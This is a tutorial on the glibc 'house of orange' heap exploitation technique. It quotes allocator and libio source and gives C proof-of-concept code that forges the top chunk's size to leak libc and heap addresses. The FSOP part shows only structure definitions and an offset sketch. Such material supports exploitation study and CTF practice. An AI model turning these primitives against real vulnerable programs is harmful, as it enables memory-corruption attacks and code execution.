If we cannot free heap memory, it is hard to leak the addresses we need, but house of orange can solve this kind of problem. House of orange consists of two parts: an address leak plus FSOP.
Address Leak
When we request a block of memory, malloc first checks whether any of the bins can satisfy the request. If none of them can, it falls back to the top chunk; if the top chunk cannot satisfy the request either, it calls sysmalloc to obtain memory from the system.

sysmalloc handles this in one of two ways: it either mmaps a new region directly, or it extends the top chunk (via brk):
```c
  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
      && (mp_.n_mmaps < mp_.n_mmaps_max))
    {
      char *mm;           /* return value from mmap call*/

    try_mmap:
```
```c
  old_top = av->top;
  old_size = chunksize (old_top);
  old_end = (char *) (chunk_at_offset (old_top, old_size));

  brk = snd_brk = (char *) (MORECORE_FAILURE);

  /*
     If not the first time through, we require old_size to be
     at least MINSIZE and to have prev_inuse set.
   */

  assert ((old_top == initial_top (av) && old_size == 0) ||
          ((unsigned long) (old_size) >= MINSIZE &&
           prev_inuse (old_top) &&
           ((unsigned long) old_end & pagemask) == 0));

  /* Precondition: not enough current space to satisfy nb request */
  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
```
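As a concrete illustration, here is a minimal sketch of how an attacker-controlled top chunk size can pass both asserts above while still avoiding the mmap branch. It assumes a 64-bit glibc of the 2.23/2.24 era and a how2heap-style setup in which the direct write to the size field stands in for a real heap overflow; the concrete numbers (0x400, 0xc01, 0x1000) are illustrative, not required values.

```c
#include <stdlib.h>

int main(void)
{
    /* Assumption: no earlier allocations, so the heap starts page
       aligned and the top chunk begins at heap_base + 0x400 after
       this first request (chunk size 0x400). */
    char *p = malloc(0x400 - 16);
    size_t *top_size = (size_t *)(p + 0x400 - 8);  /* top chunk's size field */

    /* The forged value must
         1. keep PREV_INUSE set,
         2. be at least MINSIZE (0x20 on 64-bit),
         3. keep the end of the old top page aligned
            (heap_base + 0x400 + 0xc00 == heap_base + 0x1000),
         4. be smaller than the coming request plus MINSIZE.
       In a real target this write comes from a heap overflow; here we
       simply simulate it. */
    *top_size = 0xc01;

    /* Larger than the forged top (so sysmalloc runs) but far below
       mp_.mmap_threshold, so the brk path is taken and the old top
       ends up freed into the unsorted bin. */
    malloc(0x1000);
    return 0;
}
```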
Once the four conditions above are satisfied, execution continues and _int_free is eventually called on the old top chunk, freeing it and placing it into the unsorted bin:
```c
  top (av) = chunk_at_offset (heap, sizeof (*heap));
  set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);

  /* Setup fencepost and free the old top chunk with a multiple of
     MALLOC_ALIGNMENT in size. */
  /* The fencepost takes at least MINSIZE bytes, because it might
     become the top chunk again later.  Note that a footer is set
     up, too, although the chunk is marked in use. */
  old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
  set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
            0 | PREV_INUSE);
  if (old_size >= MINSIZE)
    {
      set_head (chunk_at_offset (old_top, old_size),
                (2 * SIZE_SZ) | PREV_INUSE);
      set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
      set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
      _int_free (av, old_top, 1);
    }
```
At this point we have a free chunk in the unsorted bin. The next time we request an allocation that fits within it, the chunk is split out of the unsorted bin, and the bin pointers left behind in the returned memory let us leak a libc address, as the sketch below shows.
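Putting the pieces together, a minimal sketch of the whole leak phase might look like the following. Again this assumes a 64-bit glibc around 2.23/2.24, no allocations before the first malloc, and the direct write to the top chunk's size field is a stand-in for whatever heap overflow the target actually provides.

```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Shrink the top chunk (stand-in for a real heap overflow). */
    char *p1 = malloc(0x400 - 16);
    *(size_t *)(p1 + 0x400 - 8) = 0xc01;

    /* Too big for the forged top: sysmalloc extends the heap with brk,
       frees the old top into the unsorted bin, and serves this request
       from the new top chunk. */
    malloc(0x1000);

    /* This request is carved out of the freed old top.  malloc does not
       clear the chunk's stale bookkeeping pointers, so the first two
       qwords of the returned memory still point at a bin list head
       inside main_arena, and the next two point back into the heap. */
    size_t *p2 = malloc(0x400 - 16);
    printf("libc leak (into main_arena): %p\n", (void *)p2[0]);
    printf("heap leak                  : %p\n", (void *)p2[2]);
    return 0;
}
```

In a real exploit, the leaked value sits at a fixed offset from the libc base for a given libc build; find that offset once in a debugger and subtract it to recover the base address.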
FSOP

The second half of house of orange is FSOP (File Stream Oriented Programming), which abuses the _IO_FILE structures that glibc's stdio maintains for every open stream. The relevant definitions from glibc's libio are:

```c
struct _IO_FILE {
  int _flags;           /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;   /* Current read pointer */
  char* _IO_read_end;   /* End of get area. */
  char* _IO_read_base;  /* Start of putback+get area. */
  char* _IO_write_base; /* Start of put area. */
  char* _IO_write_ptr;  /* Current put pointer. */
  char* _IO_write_end;  /* End of put area. */
  char* _IO_buf_base;   /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base;   /* Pointer to start of non-current get area. */
  char *_IO_backup_base; /* Pointer to first valid character of backup area */
  char *_IO_save_end;    /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
#if defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001
  _IO_off64_t _offset;
# if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
# else
  void *__pad1;
  void *__pad2;
  void *__pad3;
  void *__pad4;
# endif
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
#endif
};
```
```c
/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;   /* Start of putback+get area. */
  wchar_t *_IO_write_base;  /* Start of put area. */
  wchar_t *_IO_write_ptr;   /* Current put pointer. */
  wchar_t *_IO_write_end;   /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;     /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;   /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};
```
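One structure that is not shown above but matters for FSOP is struct _IO_FILE_plus from glibc's libio internals: every stdio stream is really an _IO_FILE followed by a vtable pointer, and all streams are linked through _chain starting from the global _IO_list_all. Reproduced here for reference:

```c
/* From glibc's libio/libioP.h.  stdin/stdout/stderr are _IO_FILE_plus
   objects; _IO_list_all points at the head of the list that their
   _chain fields form. */
struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

extern struct _IO_FILE_plus *_IO_list_all;
```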
The other structure we will keep referring to is the arena itself, struct malloc_state:

```c
struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
```
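The arena layout above also explains the leak arithmetic. What follows is a minimal sketch, not glibc's real definition: a simplified 64-bit glibc-2.23-style malloc_state (assuming mutex_t is int-sized and NFASTBINS is 10), used only to show why the freed old top's fd/bk point at main_arena + 88.

```c
#include <stdio.h>
#include <stddef.h>

/* Simplified stand-in for glibc 2.23's malloc_state on x86-64. */
typedef void *mfastbinptr;
typedef void *mchunkptr;
#define NFASTBINS 10
#define NBINS     128

struct malloc_state_sketch
{
    int mutex;
    int flags;
    mfastbinptr fastbinsY[NFASTBINS];
    mchunkptr top;
    mchunkptr last_remainder;
    mchunkptr bins[NBINS * 2 - 2];
    /* binmap, next, next_free, ... omitted: they all sit after bins. */
};

int main(void)
{
    size_t bins_off = offsetof(struct malloc_state_sketch, bins);

    /* bin_at(av, 1), the unsorted bin's list head, is &bins[0] minus
       the 0x10-byte chunk header, so the fd/bk written into the freed
       old top point at main_arena + 88. */
    printf("offsetof(bins)         = %zu\n", bins_off);       /* 104 */
    printf("unsorted bin list head = main_arena + %zu\n",
           bins_off - 0x10);                                  /* 88  */
    return 0;
}
```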